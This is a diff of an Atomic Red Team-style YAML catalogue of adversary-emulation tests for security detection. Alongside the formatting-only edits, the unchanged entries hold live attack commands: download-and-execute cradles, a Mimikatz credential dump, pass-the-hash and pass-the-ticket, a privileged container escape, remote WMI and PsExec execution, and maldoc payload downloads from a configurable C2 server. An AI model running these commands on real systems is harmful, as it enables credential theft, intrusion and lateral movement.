       supported_platforms:
       - linux
       input_arguments:
@@ -58918,10 +58918,10 @@ execution:
         name: bash
         command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
 
-          '
+'
         cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name}
 
-          '
+'
   T1610:
     technique:
       external_references:
@@ -59008,24 +59008,24 @@ execution:
       - description: Verify docker is installed.
         prereq_command: 'which docker
 
-          '
+'
         get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not
           Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker
           ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else
           echo "Docker installed"; fi
 
-          '
+'
       - description: Verify docker service is running.
         prereq_command: 'sudo systemctl status docker
 
-          '
+'
         get_prereq_command: 'sudo systemctl start docker
 
-          '
+'
       - description: Verify kind is in the path.
         prereq_command: 'which kind
 
-          '
+'
         get_prereq_command: |
           curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64
           chmod +x ./kind
@@ -59033,14 +59033,14 @@ execution:
       - description: Verify kind-atomic-cluster is created
         prereq_command: 'sudo kind get clusters
 
-          '
+'
         get_prereq_command: 'sudo kind create cluster --name atomic-cluster
 
-          '
+'
       - description: Verify kubectl is in path
         prereq_command: 'which kubectl
 
-          '
+'
         get_prereq_command: |
           curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
           chmod +x ./kubectl
@@ -59050,11 +59050,11 @@ execution:
           -ti --rm --image alpine --overrides ''{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin":
           true,"tty":true,"securityContext":{"privileged":true}}]}}''
 
-          '
+'
         name: sh
         cleanup_command: 'kubectl --context kind-atomic-cluster delete pod atomic-escape-pod
 
-          '
+'
   T1559.002:
     technique:
       created: '2020-02-12T14:10:50.699Z'
@@ -59131,7 +59131,7 @@ execution:
       auto_generated_guid: f592ba2a-e9e8-4d62-a459-ef63abd819fd
       description: 'Executes commands via DDE using Microsfot Word
 
-        '
+'
       supported_platforms:
       - windows
       executor:
@@ -59154,13 +59154,13 @@ execution:
         ok on a dialogue box, then attempt to run PowerShell with DDEAUTO to download
         and execute a powershell script
 
-        '
+'
       supported_platforms:
       - windows
       executor:
         command: 'start $PathToAtomicsFolder\T1559.002\bin\DDE_Document.docx
 
-          '
+'
         name: command_prompt
     - name: DDEAUTO
       auto_generated_guid: cf91174c-4e74-414e-bec0-8d60a104d181
@@ -59474,7 +59474,7 @@ execution:
       auto_generated_guid: 6fb61988-724e-4755-a595-07743749d4e2
       description: 'Utilize launchctl
 
-        '
+'
       supported_platforms:
       - macos
       input_arguments:
@@ -59489,10 +59489,10 @@ execution:
       executor:
         command: 'launchctl submit -l #{label_name} -- #{executable_path}
 
-          '
+'
         cleanup_command: 'launchctl remove #{label_name}
 
-          '
+'
         name: bash
   T1053.004:
     technique:
@@ -59633,7 +59633,7 @@ execution:
         jse_path:
           description: 'Path for the macro to write out the "malicious" .jse file
 
-            '
+'
           type: String
           default: C:\Users\Public\art.jse
         ms_product:
@@ -59644,7 +59644,7 @@ execution:
       dependencies:
       - description: 'Microsoft #{ms_product} must be installed
 
-          '
+'
         prereq_command: |
           try {
             New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -59655,7 +59655,7 @@ execution:
         get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
           manually to meet this requirement"
 
-          '
+'
       executor:
         command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -59664,13 +59664,13 @@ execution:
           Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
         cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore
 
-          '
+'
         name: powershell
     - name: OSTap Payload Download
       auto_generated_guid: 3f3af983-118a-4fa1-85d3-ba4daa739d80
       description: 'Uses cscript //E:jscript to download a file
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -59688,7 +59688,7 @@ execution:
           cscript //E:Jscript #{script_file}
         cleanup_command: 'del #{script_file} /F /Q >nul 2>&1
 
-          '
+'
         name: command_prompt
     - name: Maldoc choice flags command execution
       auto_generated_guid: 0330a5d2-a45a-4272-a9ee-e364411c4b18
@@ -59706,7 +59706,7 @@ execution:
       dependencies:
       - description: 'Microsoft #{ms_product} must be installed
 
-          '
+'
         prereq_command: |
           try {
             New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -59717,7 +59717,7 @@ execution:
         get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
           manually to meet this requirement"
 
-          '
+'
       executor:
         command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -59745,7 +59745,7 @@ execution:
       dependencies:
       - description: 'Microsoft #{ms_product} must be installed
 
-          '
+'
         prereq_command: |
           try {
             New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -59756,7 +59756,7 @@ execution:
         get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
           manually to meet this requirement"
 
-          '
+'
       executor:
         command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -59783,7 +59783,7 @@ execution:
       dependencies:
       - description: 'Microsoft #{ms_product} must be installed
 
-          '
+'
         prereq_command: |
           try {
             New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -59794,7 +59794,7 @@ execution:
         get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
           manually to meet this requirement"
 
-          '
+'
       executor:
         command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -59826,7 +59826,7 @@ execution:
       dependencies:
       - description: 'Microsoft Excel must be installed
 
-          '
+'
         prereq_command: |
           try {
             New-Object -COMObject "Excel.Application" | Out-Null
@@ -59836,7 +59836,7 @@ execution:
         get_prereq_command: 'Write-Host "You will need to install Microsoft Excel
           manually to meet this requirement"
 
-          '
+'
       executor:
         command: |
           $fname = "$env:TEMP\atomic_redteam_x4m_exec.vbs"
@@ -59908,7 +59908,7 @@ execution:
       dependencies:
       - description: 'Microsoft Word must be installed
 
-          '
+'
         prereq_command: |
           try {
             $wdApp = New-Object -COMObject "Word.Application"
@@ -59917,10 +59917,10 @@ execution:
         get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually
           to meet this requirement"
 
-          '
+'
       - description: 'Google Chrome must be installed
 
-          '
+'
         prereq_command: |
           try {
             $chromeInstalled = (Get-Item (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe').'(Default)').VersionInfo.FileName
@@ -59929,7 +59929,7 @@ execution:
         get_prereq_command: 'Write-Host "You will need to install Google Chrome manually
           to meet this requirement"
 
-          '
+'
       executor:
         command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -59947,7 +59947,7 @@ execution:
         instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify
         anti-pua protection).
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -59967,7 +59967,7 @@ execution:
           & "#{pua_file}"
         cleanup_command: 'Remove-Item #{pua_file}
 
-          '
+'
     - name: Office Generic Payload Download
       auto_generated_guid: 5202ee05-c420-4148-bf5e-fd7f7d24850c
       description: |
@@ -59982,14 +59982,14 @@ execution:
         macro_path:
           description: 'Location of file which will be converted to a VBA macro
 
-            '
+'
           type: Path
           default: PathToAtomicsFolder/T1204.002/src/test9-GenericPayloadDownload.txt
         c2_domain:
           description: 'This required variable points to a user defined HTTP server
             that will host the file_name in the c2_parent_directory.
 
-            '
+'
           type: url
           default: "$false"
         c2_parent_directory:
@@ -60008,7 +60008,7 @@ execution:
         ms_product:
           description: 'Maldoc application Word or Excel
 
-            '
+'
           type: String
           default: Word
       dependency_executor_name: powershell
@@ -60016,17 +60016,17 @@ execution:
       - description: 'Destination c2_domain name or IP address must be set to a running
           HTTP server.
 
-          '
+'
         prereq_command: 'if (#{c2_domain}) (exit 0) else (exit 1)
 
-          '
+'
         get_prereq_command: 'Write-Host "Destination c2 server domain name or IP address
           must be set and reachable for HTTP service"
 
-          '
+'
       - description: 'Microsoftt #{ms_product} must be installed
 
-          '
+'
         prereq_command: |
           try {
             New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -60037,7 +60037,7 @@ execution:
         get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
           manually to meet this requirement"
 
-          '
+'
       executor:
         name: powershell
         command: |
@@ -60050,7 +60050,7 @@ execution:
         cleanup_command: 'Remove-Item "C:\Users\$env:username\Desktop\#{file_name}"
           -ErrorAction Ignore
 
-          '
+'
   T1204.003:
     technique:
       external_references:
@@ -60392,7 +60392,7 @@ execution:
       description: 'Download Mimikatz and dump credentials. Upon execution, mimikatz
         dump details and password hashes will be displayed.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -60404,7 +60404,7 @@ execution:
         command: 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''#{mimurl}'');
           Invoke-Mimikatz -DumpCreds"
 
-          '
+'
         name: command_prompt
         elevation_required: true
     - name: Run BloodHound from local disk
@@ -60424,15 +60424,15 @@ execution:
       dependencies:
       - description: 'SharpHound.ps1 must be located at #{file_path}
 
-          '
+'
         prereq_command: 'if (Test-Path #{file_path}\SharpHound.ps1) {exit 0} else
           {exit 1}
 
-          '
+'
         get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1"
           -OutFile "#{file_path}\SharpHound.ps1"
 
-          '
+'
       executor:
         command: |
           write-host "Import and Execution of SharpHound.ps1 from #{file_path}" -ForegroundColor Cyan
@@ -60441,7 +60441,7 @@ execution:
           Start-Sleep 5
         cleanup_command: 'Remove-Item $env:Temp\*BloodHound.zip -Force
 
-          '
+'
         name: powershell
     - name: Run Bloodhound from Memory using Download Cradle
       auto_generated_guid: bf8c1441-4674-4dab-8e4e-39d93d08f9b7
@@ -60459,7 +60459,7 @@ execution:
           Start-Sleep 5
         cleanup_command: 'Remove-Item $env:Temp\*BloodHound.zip -Force
 
-          '
+'
         name: powershell
     - name: Obfuscation Tests
       auto_generated_guid: 4297c41a-8168-4138-972d-01f3ee92c804
@@ -60467,7 +60467,7 @@ execution:
         out to bit.ly/L3g1t and displays: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM
         REMOTE LOCATION"
 
-        '
+'
       supported_platforms:
       - windows
       executor:
@@ -60482,7 +60482,7 @@ execution:
         will take place to open file explorer, open notepad and input code, then mimikatz
         dump info will be displayed.
 
-        '
+'
       supported_platforms:
       - windows
       executor:
@@ -60513,7 +60513,7 @@ execution:
         command: 'Powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'');
           Invoke-AppPathBypass -Payload ''C:\Windows\System32\cmd.exe''"
 
-          '
+'
         name: command_prompt
     - name: Powershell MsXml COM object - with prompt
       auto_generated_guid: 388a7340-dbc1-4c9d-8e59-b75ad8c6d5da
@@ -60533,7 +60533,7 @@ execution:
           MsXml2.ServerXmlHttp;$comMsXml.Open(''GET'',''#{url}'',$False);$comMsXml.Send();IEX
           $comMsXml.ResponseText"
 
-          '
+'
         name: command_prompt
     - name: Powershell XML requests
       auto_generated_guid: 4396927f-e503-427b-b023-31049b9b09a6
@@ -60553,7 +60553,7 @@ execution:
           bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load(''#{url}'');$Xml.command.a.execute
           | IEX"
 
-          '
+'
         name: command_prompt
     - name: Powershell invoke mshta.exe download
       auto_generated_guid: 8a2ad40b-12c7-4b25-8521-2737b0a415af
@@ -60571,7 +60571,7 @@ execution:
       executor:
         command: 'C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject(''script:#{url}'').Exec();close()"
 
-          '
+'
         name: command_prompt
     - name: Powershell Invoke-DownloadCradle
       auto_generated_guid: cc50fa2a-a4be-42af-a88f-e347ba0bf4d7
@@ -60613,26 +60613,26 @@ execution:
       dependencies:
       - description: 'PowerShell version 2 must be installed
 
-          '
+'
         prereq_command: 'if(2 -in $PSVersionTable.PSCompatibleVersions.Major) {exit
           0} else {exit 1}
 
-          '
+'
         get_prereq_command: 'Write-Host  Automated installer not implemented yet,
           please install PowerShell v2 manually
 
-          '
+'
       executor:
         command: 'powershell.exe -version 2 -Command Write-Host $PSVersion
 
-          '
+'
         name: powershell
     - name: NTFS Alternate Data Stream Access
       auto_generated_guid: 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680
       description: 'Creates a file with an alternate data stream and simulates executing
         that hidden code/file. Upon execution, "Stream Data Executed" will be displayed.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -60643,14 +60643,14 @@ execution:
       dependencies:
       - description: 'Homedrive must be an NTFS drive
 
-          '
+'
         prereq_command: 'if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem
           -contains "NTFS") {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: 'Write-Host Prereq''s for this test cannot be met automatically
 
-          '
+'
       executor:
         name: powershell
         command: |
@@ -60659,7 +60659,7 @@ execution:
           Invoke-Expression $streamcommand
         cleanup_command: 'Remove-Item #{ads_file} -Force -ErrorAction Ignore
 
-          '
+'
     - name: PowerShell Session Creation and Use
       auto_generated_guid: 7c1acec2-78fa-4305-a3e0-db2a54cddecd
       description: |
@@ -60676,12 +60676,12 @@ execution:
       dependencies:
       - description: 'PSRemoting must be enabled
 
-          '
+'
         prereq_command: "Try {\n    New-PSSession -ComputerName #{hostname_to_connect}
           -ErrorAction Stop | Out-Null\n    exit 0\n} \nCatch {\n    exit 1\n}\n"
         get_prereq_command: 'Enable-PSRemoting
 
-          '
+'
       executor:
         name: powershell
         elevation_required: true
@@ -60715,7 +60715,7 @@ execution:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-          '
+'
       executor:
         command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type}
           -CommandParamVariation #{command_param_variation} -Execute -ErrorAction
@@ -60751,7 +60751,7 @@ execution:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-          '
+'
       executor:
         command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type}
           -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation
@@ -60782,7 +60782,7 @@ execution:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-          '
+'
       executor:
         command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type}
           -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute
@@ -60818,7 +60818,7 @@ execution:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-          '
+'
       executor:
         command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type}
           -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments
@@ -60831,7 +60831,7 @@ execution:
         outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection
         Report by Red Canary.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -60842,7 +60842,7 @@ execution:
       executor:
         command: 'powershell.exe -e  #{obfuscated_code}
 
-          '
+'
         name: command_prompt
     - name: PowerShell Invoke Known Malicious Cmdlets
       auto_generated_guid: 49eb9404-5e0f-4031-a179-b40f7be385e3
@@ -60864,7 +60864,7 @@ execution:
             "PowerUp", "PowerView", "Remove-Comments", "Remove-VolumeShadowCopy",
             "Set-CriticalProcess", "Set-MasterBootRecord"
 
-            '
+'
       executor:
         name: powershell
         elevation_required: true
@@ -60950,13 +60950,13 @@ execution:
           $which_python -c 'import requests' 2>/dev/null; echo $?
         get_prereq_command: 'pip install requests
 
-          '
+'
       executor:
         command: '$which_python -c ''import requests;import os;url = "#{script_url}";malicious_command
           = "#{executor} #{payload_file_name} #{script_args}";session = requests.session();source
           = session.get(url).content;fd = open("#{payload_file_name}", "wb+");fd.write(source);fd.close();os.system(malicious_command)''
 
-          '
+'
         name: sh
         cleanup_command: "rm #{payload_file_name}  \n"
     - name: Execute Python via scripts (Linux)
@@ -60992,7 +60992,7 @@ execution:
       dependencies:
       - description: 'Requires Python
 
-          '
+'
         prereq_command: |
           which_python=`which python`; python -V
           $which_python -c 'import requests' 2>/dev/null; echo $?
@@ -61018,7 +61018,7 @@ execution:
         an external malicious script then executes locally using the supplied executor
         and arguments
 
-        '
+'
       supported_platforms:
       - linux
       input_arguments:
@@ -61052,7 +61052,7 @@ execution:
       dependencies:
       - description: 'Requires Python
 
-          '
+'
         prereq_command: |
           which_python=`which python`; python -V
           $which_python -c 'import requests' 2>/dev/null; echo $?
@@ -61074,7 +61074,7 @@ execution:
         name: sh
         cleanup_command: 'rm #{python_binary_name} #{python_script_name} #{payload_file_name}
 
-          '
+'
   T1053.005:
     technique:
       created: '2019-11-27T14:58:00.429Z'
@@ -61172,7 +61172,7 @@ execution:
       description: 'Upon successful execution, cmd.exe will create a scheduled task
         to spawn cmd.exe at 20:10.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -61189,10 +61189,10 @@ execution:
         elevation_required: false
         command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
 
-          '
+'
         cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1
 
-          '
+'
     - name: Scheduled task Remote
       auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd
       description: |
@@ -61228,11 +61228,11 @@ execution:
         command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN
           "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
 
-          '
+'
         cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password}
           /TN "Atomic task" /F >nul 2>&1
 
-          '
+'
     - name: Powershell Cmdlet Scheduled Task
       auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd
       description: |
@@ -61254,7 +61254,7 @@ execution:
         cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false
           >$null 2>&1
 
-          '
+'
     - name: Task Scheduler via VBA
       auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3
       description: |
@@ -61271,7 +61271,7 @@ execution:
       dependencies:
       - description: 'Microsoft #{ms_product} must be installed
 
-          '
+'
         prereq_command: |
           try {
             New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -61282,7 +61282,7 @@ execution:
         get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
           manually to meet this requirement"
 
-          '
+'
       executor:
         command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
           (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
@@ -61295,7 +61295,7 @@ execution:
         login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing
         as Register-ScheduledTask cmdlet behind the scenes.
 
-        '
+'
       supported_platforms:
       - windows
       executor:
@@ -61307,7 +61307,7 @@ execution:
         cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false
           >$null 2>&1
 
-          '
+'
   T1053:
     technique:
       id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9
@@ -61521,7 +61521,7 @@ execution:
           sc.exe delete #{service_name}
         cleanup_command: 'del C:\art-marker.txt >nul 2>&1
 
-          '
+'
         name: command_prompt
         elevation_required: true
     - name: Use PsExec to execute a command on a remote host
@@ -61555,10 +61555,10 @@ execution:
       - description: 'PsExec tool from Sysinternals must exist on disk at specified
           location (#{psexec_exe})
 
-          '
+'
         prereq_command: 'if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1}
 
-          '
+'
         get_prereq_command: |
           Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
           Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
@@ -61568,7 +61568,7 @@ execution:
         command: '#{psexec_exe} \\#{remote_host} -u #{user_name} -p #{password} -accepteula
           "C:\Windows\System32\calc.exe"
 
-          '
+'
         name: command_prompt
   T1129:
     technique:
@@ -61701,7 +61701,7 @@ execution:
       description: 'An adversary may use Radmin Viewer Utility to remotely control
         Windows device, this will start the radmin console.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -61717,10 +61717,10 @@ execution:
       - description: 'Radmin Viewer Utility must be installed at specified location
           (#{radmin_exe})
 
-          '
+'
         prereq_command: 'if not exist "#{radmin_exe}" (exit /b 1)
 
-          '
+'
         get_prereq_command: |
           echo Downloading radmin installer
           bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer}
@@ -61993,7 +61993,7 @@ execution:
       auto_generated_guid: 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873
       description: 'Creates and executes a simple bash script.
 
-        '
+'
       supported_platforms:
       - macos
       - linux
@@ -62010,7 +62010,7 @@ execution:
           sh #{script_path}
         cleanup_command: 'rm #{script_path}
 
-          '
+'
         name: sh
     - name: Command-Line Interface
       auto_generated_guid: d0c88567-803d-4dca-99b4-7ce65e7b257c
@@ -62027,7 +62027,7 @@ execution:
           wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
         cleanup_command: 'rm /tmp/art-fish.txt
 
-          '
+'
         name: sh
   T1204:
     technique:
@@ -62184,7 +62184,7 @@ execution:
       dependencies:
       - description: 'The 64-bit version of Microsoft Office must be installed
 
-          '
+'
         prereq_command: |
           try {
             $wdApp = New-Object -COMObject "Word.Application"
@@ -62195,7 +62195,7 @@ execution:
         get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit)
           manually to meet this requirement"
 
-          '
+'
       executor:
         command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -62204,7 +62204,7 @@ execution:
         cleanup_command: 'Get-WmiObject win32_process | Where-Object {$_.CommandLine
           -like "*mshta*"}  | % { "$(Stop-Process $_.ProcessID)" } | Out-Null
 
-          '
+'
         name: powershell
     - name: Extract Memory via VBA
       auto_generated_guid: 8faff437-a114-4547-9a60-749652a03df6
@@ -62223,7 +62223,7 @@ execution:
       dependencies:
       - description: 'Microsoft #{ms_product} must be installed
 
-          '
+'
         prereq_command: |
           try {
             New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -62234,7 +62234,7 @@ execution:
         get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
           manually to meet this requirement"
 
-          '
+'
       executor:
         command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
           (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
@@ -62243,7 +62243,7 @@ execution:
         cleanup_command: 'Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin"
           -ErrorAction Ignore
 
-          '
+'
         name: powershell
   T1059.003:
     technique:
@@ -62294,7 +62294,7 @@ execution:
       description: 'Creates and executes a simple batch script. Upon execution, CMD
         will briefly launch to run the batch script then close again.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -62310,27 +62310,27 @@ execution:
       dependencies:
       - description: 'Batch file must exist on disk at specified location (#{script_path})
 
-          '
+'
         prereq_command: 'if (Test-Path #{script_path}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item #{script_path} -Force | Out-Null
           Set-Content -Path #{script_path} -Value "#{command_to_execute}"
       executor:
         command: 'Start-Process #{script_path}
 
-          '
+'
         cleanup_command: 'Remove-Item #{script_path} -Force -ErrorAction Ignore
 
-          '
+'
         name: powershell
     - name: Writes text to a file and displays it.
       auto_generated_guid: 127b4afe-2346-4192-815c-69042bec570e
       description: 'Writes text to a file and display the results. This test is intended
         to emulate the dropping of a malicious file to disk.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -62345,17 +62345,17 @@ execution:
       executor:
         command: 'echo "#{message}" > "#{file_contents_path}" & type "#{file_contents_path}"
 
-          '
+'
         cleanup_command: 'del "#{file_contents_path}"
 
-          '
+'
         name: command_prompt
     - name: Suspicious Execution via Windows Command Shell
       auto_generated_guid: d0eb3597-a1b3-4d65-b33b-2cda8d397f20
       description: 'Command line executed via suspicious invocation. Example is from
         the 2021 Threat Detection Report by Red Canary.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -62446,7 +62446,7 @@ execution:
       executor:
         command: 'wmic useraccount get /ALL /format:csv
 
-          '
+'
         name: command_prompt
     - name: WMI Reconnaissance Processes
       auto_generated_guid: 5750aa16-0e59-4410-8b9a-8a47ca2788e2
@@ -62458,7 +62458,7 @@ execution:
       executor:
         command: 'wmic process get caption,executablepath,commandline /format:csv
 
-          '
+'
         name: command_prompt
     - name: WMI Reconnaissance Software
       auto_generated_guid: 718aebaa-d0e0-471a-8241-c5afa69c7414
@@ -62470,7 +62470,7 @@ execution:
       executor:
         command: 'wmic qfe get description,installedOn /format:csv
 
-          '
+'
         name: command_prompt
     - name: WMI Reconnaissance List Remote Services
       auto_generated_guid: 0fd48ef7-d890-4e93-a533-f7dedd5191d3
@@ -62494,7 +62494,7 @@ execution:
       executor:
         command: 'wmic /node:"#{node}" service where (caption like "%#{service_search_string}%")
 
-          '
+'
         name: command_prompt
     - name: WMI Execute Local Process
       auto_generated_guid: b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3
@@ -62511,11 +62511,11 @@ execution:
       executor:
         command: 'wmic process call create #{process_to_execute}
 
-          '
+'
         cleanup_command: 'wmic process where name=''#{process_to_execute}'' delete
           >nul 2>&1
 
-          '
+'
         name: command_prompt
     - name: WMI Execute Remote Process
       auto_generated_guid: 9c8ef159-c666-472f-9874-90c8d60d136b
@@ -62546,11 +62546,11 @@ execution:
         command: 'wmic /user:#{user_name} /password:#{password} /node:"#{node}" process
           call create #{process_to_execute}
 
-          '
+'
         cleanup_command: 'wmic /user:#{user_name} /password:#{password} /node:"#{node}"
           process where name=''#{process_to_execute}'' delete >nul 2>&1
 
-          '
+'
         name: command_prompt
     - name: Create a Process using WMI Query and an Encoded Command
       auto_generated_guid: 7db7a7f9-9531-4840-9b30-46220135441c
@@ -62567,7 +62567,7 @@ execution:
       executor:
         command: 'powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA
 
-          '
+'
         name: command_prompt
     - name: Create a Process using obfuscated Win32_Process
       auto_generated_guid: 10447c83-fc38-462a-a936-5102363b1c43
@@ -62880,7 +62880,7 @@ lateral-movement:
         command: '[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe",
           $null, $null, "7")
 
-          '
+'
         name: powershell
   T1210:
     technique:
@@ -63133,7 +63133,7 @@ lateral-movement:
       - description: 'Mimikatz executor must exist on disk and at specified location
           (#{mimikatz_path})
 
-          '
+'
         prereq_command: |
           $mimikatz_path = cmd /c echo #{mimikatz_path}
           if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
@@ -63147,13 +63147,13 @@ lateral-movement:
         command: '#{mimikatz_path} "sekurlsa::pth /user:#{user_name} /domain:#{domain}
           /ntlm:#{ntlm}"
 
-          '
+'
         name: command_prompt
     - name: crackmapexec Pass the Hash
       auto_generated_guid: eb05b028-16c8-4ad8-adea-6f5b219da9a9
       description: 'command execute with crackmapexec
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -63182,18 +63182,18 @@ lateral-movement:
       - description: 'CrackMapExec executor must exist on disk at specified location
           (#{crackmapexec_exe})
 
-          '
+'
         prereq_command: 'if(Test-Path #{crackmapexec_exe}) { 0 } else { -1 }
 
-          '
+'
         get_prereq_command: 'Write-Host Automated installer not implemented yet, please
           install crackmapexec manually at this location: #{crackmapexec_exe}
 
-          '
+'
       executor:
         command: 'crackmapexec #{domain} -u #{user_name} -H #{ntlm} -x #{command}
 
-          '
+'
         name: command_prompt
   T1550.003:
     technique:
@@ -63272,7 +63272,7 @@ lateral-movement:
       auto_generated_guid: dbf38128-7ba7-4776-bedf-cc2eed432098
       description: 'Similar to PTH, but attacking Kerberos
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -63292,10 +63292,10 @@ lateral-movement:
       dependencies:
       - description: 'Mimikatz must exist on disk at specified location (#{mimikatz_exe})
 
-          '
+'
         prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
